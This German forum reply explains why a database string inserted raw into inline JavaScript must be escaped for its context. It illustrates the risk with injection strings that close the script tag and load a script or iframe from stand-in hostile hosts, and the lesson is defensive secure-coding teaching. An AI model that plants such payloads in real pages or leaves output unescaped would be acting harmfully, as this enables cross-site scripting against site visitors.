Hallo,

Beispielcode:

[code lang=html]

<script type="text/javascript">
function show(a,b) {
document.getElementById(a).style.display = "block";
document.getElementById(b).style.display = "none";
document.forms.Testform.arr_textarea[201].value = "Hallo Welt!"
      }
</script>

[...]

Nur, dass eben anstelle von Hallo Welt der String aus der db kommt. Und zwar als Rohdaten, also nut Text inkl. Zeilenumbrüche.

stelle Dir bitte vor, statt

Hallo Welt!

stände da

" + ", irgendwas

oder

";
    }
    </script>
    <script type='text/javascript' src='boeser.server.example.org/uebler_code.js'>

oder

";
    }
    </script>
    <iframe src='noch.schlimmerer.host.example.org/ganz_schlimme_seite'>

oder einfach nur

er sagte: "Hallo, Nick!"

Überlege Dir, wie das resultierende HTML aussieht, das an den Browser geschickt wird. Grundsätzlich gilt es, diese Zeichenkette kontextgerecht zu behandeln. Wie dedlfix schreibt: von innen nach außen.

Freundliche Grüße

Vinzenz